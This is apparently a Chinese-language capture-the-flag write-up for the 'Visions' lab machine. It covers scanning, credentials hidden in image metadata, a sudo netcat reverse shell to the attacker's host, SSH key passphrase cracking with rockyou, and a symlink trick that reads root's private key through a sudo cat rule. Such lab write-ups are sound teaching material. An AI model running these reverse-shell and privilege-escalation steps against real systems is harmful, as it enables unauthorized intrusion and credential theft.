Visions
Visions
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(kali💀kali)-[~/temp/visions]
└─$ rustscan -a 192.168.0.168 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.0.168:22
Open 192.168.0.168:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 03:02 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Initiating Ping Scan at 03:02
Scanning 192.168.0.168 [2 ports]
Completed Ping Scan at 03:02, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:02
Completed Parallel DNS resolution of 1 host. at 03:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 03:02
Scanning visions (192.168.0.168) [2 ports]
Discovered open port 80/tcp on 192.168.0.168
Discovered open port 22/tcp on 192.168.0.168
Completed Connect Scan at 03:02, 0.00s elapsed (2 total ports)
Initiating Service scan at 03:02
Scanning 2 services on visions (192.168.0.168)
Completed Service scan at 03:02, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.168.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.21s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Nmap scan report for visions (192.168.0.168)
Host is up, received syn-ack (0.00046s latency).
Scanned at 2024-04-24 03:02:34 EDT for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyo46pXRt0tw2ynd0rsEvgyTECanjcW6Vp0gdxgMID8h9aWVoqB9fQ8YZ+IVXMlIPvuu1xXPaQm1dR9K9BRkFKrtZPn7P1X1D7wlI1NYj+zHKDC8tTLEUiSdsvFms4709PPQCU36+fvcr+Y3MceyF/Ubmo7+XEptQyvdapbVFhmM68BTP3K5F5eLaW82/lM7sXSjP4F6skZ5YJgHv4U0RUET13XikQvg/KidPiaBtu/lPjUgY9T1Hc2MHmtsjSC3qvglCIoSHD8SO1cuSv7FdFUMW+N7ouKPtyYaE6KclJs3GGWv5F7R4i7N0jewqQlN7PXQ5LzObmis/o27m66PSd
| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNcgLO3Sm65LdnZyrcyCdt+O4vIVjOwXFft0MKc7PHhUQjqFabj2OOO0O1a+xFaxVoaciPyeu0e9d9bQu+35l5o=
| 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAJcRrAeaLaJkDa1ardJpErIeSQrQEG9S41nyrKmBXmw
80/tcp open http syn-ack nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.99 seconds
漏洞发现
踩点
1
2
3
4
5
6
7
8
9
┌──(kali💀kali)-[~/temp/visions]
└─$ curl http://192.168.0.168
<!--
Only those that can see the invisible can do the imposible.
You have to be able to see what doesnt exist.
Only those that can see the invisible being able to see whats not there.
-alicia -->
..........
<img src="white.png">
提取文件信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali💀kali)-[~/temp/visions]
└─$ wget http://192.168.0.168/white.png
--2024-04-24 03:05:58-- http://192.168.0.168/white.png
Connecting to 192.168.0.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12655 (12K) [image/png]
Saving to: ‘white.png’
white.png 100%[=========================================================================>] 12.36K --.-KB/s in 0s
2024-04-24 03:05:58 (1.07 GB/s) - ‘white.png’ saved [12655/12655]
┌──(kali💀kali)-[~/temp/visions]
└─$ stegseek -wl /usr/share/wordlists/rockyou.txt white.png StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "white.png" is not supported.
┌──(kali💀kali)-[~/temp/visions]
└─$ exiftool white.png
ExifTool Version Number : 12.76
File Name : white.png
Directory : .
File Size : 13 kB
File Modification Date/Time : 2021:04:19 05:05:04-04:00
File Access Date/Time : 2024:04:24 03:06:22-04:00
File Inode Change Date/Time : 2024:04:24 03:05:58-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1920
Image Height : 1080
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Background Color : 255 255 255
Pixels Per Unit X : 11811
Pixels Per Unit Y : 11811
Pixel Units : meters
Modify Date : 2021:04:19 08:26:43
Comment : pw:ihaveadream
Image Size : 1920x1080
Megapixels : 2.1
得到密码:ihaveadream
尝试ssh连接:
提权
NC转发shell
发现用户emma
可以使用NC,尝试进行转发shell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
alicia@visions:~$ ls -la
total 20
drwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 alicia alicia 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 alicia alicia 3526 Apr 19 2021 .bashrc
-rw-r--r-- 1 alicia alicia 807 Apr 19 2021 .profile
alicia@visions:~$ sudo -l
Matching Defaults entries for alicia on visions:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User alicia may run the following commands on visions:
(emma) NOPASSWD: /usr/bin/nc
alicia@visions:~$ sudo -u emma /usr/bin/nc -e /bin/bash 192.168.143 1234
stty: 'standard input': Inappropriate ioctl for device
bash: line 12: ifconfig: command not found
继续进一步提权:
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
(remote) emma@visions:/home/alicia$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for emma:
(remote) emma@visions:/home/alicia$ cd ../emma/
(remote) emma@visions:/home/emma$ ls -la
total 32
drwxr-xr-x 3 emma emma 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 emma emma 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 emma emma 3526 Apr 19 2021 .bashrc
drwxr-xr-x 3 emma emma 4096 Apr 19 2021 .local
-rw------- 1 emma emma 20 Apr 19 2021 note.txt
-rw-r--r-- 1 emma emma 807 Apr 19 2021 .profile
-rw------- 1 emma emma 53 Apr 19 2021 .Xauthority
(remote) emma@visions:/home/emma$ cat note.txt
I cant help myself.
(remote) emma@visions:/home/emma$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
emma:x:1000:1000:emma,,,:/home/emma:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alicia:x:1001:1001:,,,:/home/alicia:/bin/bash
sophia:x:1002:1002:,,,:/home/sophia:/bin/bash
isabella:x:1003:1003:,,,:/home/isabella:/bin/bash
(remote) emma@visions:/home/emma$ cd ..
(remote) emma@visions:/home$ ls -la
total 24
drwxr-xr-x 6 root root 4096 Apr 19 2021 .
drwxr-xr-x 18 root root 4096 Apr 19 2021 ..
drwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 alicia
drwxr-xr-x 3 emma emma 4096 Apr 19 2021 emma
drwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 isabella
drwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 sophia
(remote) emma@visions:/home$ cd isabella/
(remote) emma@visions:/home/isabella$ ls -la
total 28
drwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc
-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible
-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile
drwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh
(remote) emma@visions:/home/isabella$ cd ../sophia/
(remote) emma@visions:/home/sophia$ ls -la
total 32
drwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc
-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh
drwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local
-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile
-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt
(remote) emma@visions:/home/sophia$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
(remote) emma@visions:/home/sophia$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
PS调整颜色曲线获得用户
然后看了一下师傅们的wp,发现是要对之前那个图片进行二次处理。。。。
PS
-图像
-调整
-曲线
或者ctrl+M
ocr一下:
sophia/seemstobeimpossible
尝试切换用户:
cat提权isabella
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
sophia@visions:~$ ls -la
total 32
drwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc
-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh
drwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local
-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile
-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt
sophia@visions:~$ cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
sophia@visions:~$ ./flag.sh
\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m
-------------------------
\nPWNED HOST: visions
\nPWNED DATE: Wed 24 Apr 2024 03:28:06 AM EDT
\nWHOAMI: uid=1002(sophia) gid=1002(sophia) groups=1002(sophia)
\nFLAG: hmvicanseeforever
\n------------------------
sophia@visions:~$ cat user.txt
hmvicanseeforever
sophia@visions:~$ sudo -l
Matching Defaults entries for sophia on visions:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sophia may run the following commands on visions:
(ALL : ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible
sophia@visions:~$ ls -l /home/isabella/.invisible
-rw------- 1 isabella isabella 1876 Apr 19 2021 /home/isabella/.invisible
sophia@visions:~$ sudo -u isabella /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBMekPa3i
1sMQAToGnurcIWAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDNAxlJldzm
IgVNFXbjg51CS4YEuIxM5gQxjafNJ/rzYw0sOPkT9sL6dYasQcOHX1SYxk5E+qD8QNZQPZ
GfACdWDLwOcI4LLME0BOjARwmrpU4mJXwugX4+RbGICFMgY8ZYtKXEIoF8dwKPVsBdoIwi
lgHyfJD4LwkqfV6mvlau+XRZZBhvlNP10F0SAAZqBaA9y7hRWJO/XcCZC6HzJKzloAL2Xw
GvAMzgtPH/wj06NoOFjmVGMfmmHzCwgc+fLOeXXYzFeRNPH3cVExc+BnB8Ju6CFa6n7VBV
HLCYJ3CcgKnxv6OwVtkoDi0UEFUOefELQV7fZ+g1sZt/+2XPsmcZAAAD0E8RIvVF4XlKJq
INtHdJ5QJZCuq2ufynbPNiHF53PqSlmC//OkQZMWgJ5DcbzMJ92IqxRgjilZZUOUbE/SFI
PViwmpRWIGAhlyoPXyV513ukhb4UngYlgCP9qC4Rbn+Tp9Fv7lnAoD0DsmwITM2e/Z65AD
/i/BqrJ6scNEN0q+qNr3zOVljMZx+qy8cbuDn9Tbq2/N+mcoEysfjfOaoJIgVJnLx1XE6r
+Y9UcRyPAYs+5TB1Nz/fpnBo7vesOu5XLUqCBCphFGmdMCdSGYZAweitjQ+Mq36hQmCtSs
Dwcbjg8vy5LJ+mtJXA7QhqgAfXWnLLny4NeCztUnTG0NLjbLR6M5e+HSsi2EqDYoGNpWld
l4YzVPQoFMIaUJOGTc+VfkMWbQhzpiu66/Du8dwhC+p6QSmwhV/M70eWaH2ZVjK3MThg9K
CVugFsLxioqlp/rnE1oq7apTBX6FOjwz0ne+ytTVOQrHuPTs2QL4PlCvhPRoIuqydleFs4
rdtzE6b46PexXlupewywiO5AVzbfSRAlCYwiwV42xGpYsNcKhdUY+Q9d9i9yudjIFoicrA
MG9hxr7/DJqEY311kTglDEHqQB3faErYsYPiOL9TTZWnPLZhClrPbiWST5tmMWxgNE/AKY
R7mKGDBOMFPlBAjGuKqR6zk5DEc3RzJnvGjUlaT3zzdVmxD8SpWtjzS6xHaSw/WOvB0lsg
Dhf+Gc7OWyHm2qk+OMK9t0/lbIDfn3su0EHwbPjYTT3xk7CtG4AwiSqPve1t9bOdzD9w9r
TM7am/2i/BV1uv28823pCuYZmNG7hu5InzNC/3iTROraE31Qqe3JCNwxVDcHqb8s6gTN+J
q6OyZdvNNiVQUo1l7hNUlg4he4q1kTwoyAATa0hPKVxEFEISRtaQln5Ni8V+fos8GTqgAr
HH2LpFa4qZKTtUEU0f54ixjFL7Lkz6owbUG7Cy+LuGDI1aKJRGCZwd5LkStcF/MAO3pulc
MsHiYwmXT3lNHhkAd1h05N2yBzXaH+M3sX6IpNtq+gi+9F443Enk7FBRFLzxdJ+UT40f6E
+gyA2nBGygNhvQHXcu36A8BoE+IF7YVpdfDmYJffbTujtBUj2vrdsqVvtGUxf0vj9/Sv+J
HN9Yk2giXN8VX7qhcyLzUktmdfgd6JNAx+/P7Kh3HV5oWk1Da+VJS+wtCg/oEVSVyrEOpe
skV8zcwd+ErNODEHTUbD/nDARX8GeV158RMtRdZ5CJZSFjBz2oPDPDVpZMFNhENAAwPnrJ
KD/C2J6CKylbopifizfpEkmVqJRms=
-----END OPENSSH PRIVATE KEY-----
尝试使用该密钥进行登录:
1
2
3
4
5
6
7
8
9
┌──(kali💀kali)-[~/temp/visions]
└─$ vim id_rsa
┌──(kali💀kali)-[~/temp/visions]
└─$ chmod 600 id_rsa
┌──(kali💀kali)-[~/temp/visions]
└─$ ssh isabella@192.168.0.168 -i id_rsa
Enter passphrase for key 'id_rsa':
发现需要密码,尝试破解一下:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali💀kali)-[~/temp/visions]
└─$ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
invisible (id_rsa)
1g 0:00:15:28 DONE (2024-04-24 04:09) 0.001077g/s 12.15p/s 12.15c/s 12.15C/s merda..gunner1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密码尝试登录:
cat+动态链接提权
然后尝试删除原来的目录添加动态链接到root的密钥,再切换回去读取flag!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
isabella@visions:~$ sudo -l
Matching Defaults entries for isabella on visions:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isabella may run the following commands on visions:
(emma) NOPASSWD: /usr/bin/man
isabella@visions:~$ ls -la
total 28
drwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .
drwxr-xr-x 6 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc
-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible
-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile
drwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh
isabella@visions:~$ rm -rf ./.invisible
isabella@visions:~$ ln -s /root/.ssh/id_rsa ./.invisible
isabella@visions:~$ su sophia
Password:
sophia@visions:/home/isabella$ sudo -l
Matching Defaults entries for sophia on visions:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sophia may run the following commands on visions:
(ALL : ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible
sophia@visions:/home/isabella$ sudo -u root /usr/bin/cat /home/isabella/.invisible
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAyezVs6KCQ/KFWpEkzDWX3ns/X4lUnh6PnNC2IVg3ciVgLcWF//wb
vlQxI+juYu5qTKVEL1FhkNaas+MlQUxabzOv+SDnCck60BLQbZf46sYHQaTrDyu5zhIWWi
wgPjmic/Ykd2qIQyIpyy9Ru4DiVK4RWLZWM28kb6eB99JTt4GSVEhraJ08hKsgaOi+skNg
S4QG85kG4ghmA1yJpPwzzpIdG4HUic63OXgy+z+pVB5oIEp0YXrCKMN/lBngZjZb9/+0S1
ljKzdcq7m1TOQ1Y04YJNMrxvPJ75d8U5s+m6cRxx5F3dX7oTVmErEAxFmJjdWVChzh81Ca
OnicNjHgrQAAA8hmM8ISZjPCEgAAAAdzc2gtcnNhAAABAQDJ7NWzooJD8oVakSTMNZfeez
9fiVSeHo+c0LYhWDdyJWAtxYX//Bu+VDEj6O5i7mpMpUQvUWGQ1pqz4yVBTFpvM6/5IOcJ
yTrQEtBtl/jqxgdBpOsPK7nOEhZaLCA+OaJz9iR3aohDIinLL1G7gOJUrhFYtlYzbyRvp4
H30lO3gZJUSGtonTyEqyBo6L6yQ2BLhAbzmQbiCGYDXImk/DPOkh0bgdSJzrc5eDL7P6lU
HmggSnRhesIow3+UGeBmNlv3/7RLWWMrN1yrubVM5DVjThgk0yvG88nvl3xTmz6bpxHHHk
Xd1fuhNWYSsQDEWYmN1ZUKHOHzUJo6eJw2MeCtAAAAAwEAAQAAAQEAiCmVXYHLN8h1VkIj
vzSwiU0wydqQXeOb0hIHjuqu0OEVPyhAGQNHLgwV6vIqtjmxIqgbF5FYKlQclAsq1yKGpR
AErQkb4sR4TVEyjYR6TM5mnER6YYuJysT1n667u1ogCvRDWOdUpXiHGEV7ZuYdOR78AYdL
D3n15vjcsmF5JHcftHOxnXraX7JqGXNCoRsMLT/yUOl02ClHsjFql1NTI/Br0GA4xhM/16
RHoRu1itOlWoyF4XSpSUDHW0RVQ/0gm/GyAc9QF6EWZXHfMfW07JvkeQLlndVbnItQ9a3v
ICAAh6zOZWVXpbhCPjjfaWTnwHhhSE3vfxMQQNTJnEghnQAAAIEAjAEzb6Xp6VV1RRaJR3
/Gxo0BRIbPJXdRXpDI3NO4Nvtzv8fX3muV/i+dgYPNqa7cwheSJZX9S7RzXsZTZn1Ywbdw
ahYTVyE9B4Nsen5gekylb59tNwPpCR8sJo6ZIL1GpmkEug+r+0YZyqpZXpG5uhCaSLX1fP
3UnkgqiKuzpvQAAACBAOOlQPW6pWXvULDsiUkilMXY0SNYLupMHJuqnWTuufyNfRthPQF2
gfWwXRjfDmzFoM9vVxJKKSd40696qbmTNnu7I4KyvXkF0OQ3IXIelQIiIcDpDbYd17g47J
IC6dHIQmUib3+whjeTvA5cc21y0EGNHoeNrlknE03dZHaIyfdPAAAAgQDjE3TE17PMEnd/
vzau9bBYZaoRt+eYmvXFrkU/UdRwqjS/LPWxwmpLOASW9x3bH/aiqNGBKeSe2k4C7MWWD5
tllkIbNEJNDtqQNt2NRvhDUOzAxca1C/IySuwoCAvoym5cpZ//EQ/OvWyZRwk3enReVmmd
x7Itf3P39SxqlP2pQwAAAAxyb290QHZpc2lvbnMBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
尝试进行登录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
sophia@visions:/home/isabella$ exit
exit
isabella@visions:~$ exit
logout
Connection to 192.168.0.168 closed.
┌──(kali💀kali)-[~/temp/visions]
└─$ vim root
┌──(kali💀kali)-[~/temp/visions]
└─$ chmod 600 root
┌──(kali💀kali)-[~/temp/visions]
└─$ ssh root@192.168.0.168 -i root
Linux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 19 05:24:08 2021
root@visions:~# ls -la
total 32
drwx------ 4 root root 4096 Apr 19 2021 .
drwxr-xr-x 18 root root 4096 Apr 19 2021 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rwx--x--x 1 root root 1920 Apr 19 2021 flag.sh
drwxr-xr-x 3 root root 4096 Apr 19 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 15 Apr 19 2021 root.txt
drwx------ 2 root root 4096 Apr 19 2021 .ssh
root@visions:~# cat root.txt
hmvitspossible
root@visions:~# cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
额外收获
另一个工具可以破解id_rsa
的密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali💀kali)-[~/temp/visions]
└─$ rsacrack -w /usr/share/wordlists/rockyou.txt -k id_rsa
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
-=========================-
[*] Cracking: id_rsa
[*] Wordlist: /usr/share/wordlists/rockyou.txt
[i] Status:
11274/14344392/0%/invisible
[+] Password: invisible Line: 11274
本文由作者按照 CC BY 4.0 进行授权